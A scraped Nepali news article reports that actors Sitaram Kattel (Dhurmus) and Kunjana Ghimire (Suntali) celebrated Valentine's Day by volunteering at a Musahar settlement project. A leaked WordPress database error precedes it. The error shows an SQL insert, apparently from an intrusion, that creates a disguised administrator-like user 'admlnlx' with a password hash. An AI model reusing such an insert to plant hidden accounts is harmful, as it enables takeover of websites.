WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BydiL8Wdc7KWFuftFgIEQg8OlZGn4t0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 04:31:05', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ३ –
तेस्रो एकिकृत बस्ती निर्माणमा जुटेका कलाकार सिताराम कट्टेल (धुर्मुस) र कुञ्जना घिमिरे (सुन्तली) ले मुसहर बस्तीमै प्रेम दिवस मनाएका छन् ।
प्रेम सम्बन्धबाट वैवाहिक जीवनमा प्रवेश गरेका उनीहरुले एकिकृत नमूना मुसहर बस्तीमा श्रमदान गरेर दिवस मनाएका हुन् ।
मुसहरहरुसँग पनि प्रेम साटासाट गर्न भ्यालेन्टाइनमा श्रीमान श्रीमति नै बस्तीमा पुगेको उनीहरुले बताएका छन् ।
व्यस्तताका कारण मायाप्रेमका लागि खासै फुर्सद नभएकाले मुसहरहरुसँगै काम गर्दै दिवस मनाउन लागेको उनीहरुको भनाई छ ।
प्रगाढ प्रेमकै कारण सामाजीक काममा पनि मन एक भएको भन्दै उनीहरुले एक अर्का प्रतिको विश्वास भए असम्भव केहि नभएको बताएका छन् ।
पहिलेका प्रेम दिवसभन्दा यसपालीको प्रेम दिवस अझै विशेष बनेको महसुस भएको सिताराम कट्टेलले बताएका छन् ।
मुसहरहरुको माझमा रहेर उनीहरुको दुख पिडालाई दुर गर्ने अभियानमा सरिक भएर प्रेम दिवस मनाउन पाउँदा निकै खुशी लागेको कुञ्जना घिमिरे बताएकी छिन् ।
मन मिलेमा प्रेमको लागि कुनै दिवसको आवश्यकता नपर्ने बताउँदै उनीहरुले सामाजिक काम पनि प्रेमकै एउटा स्वरुप रहेको धारणा राखेका छन् ।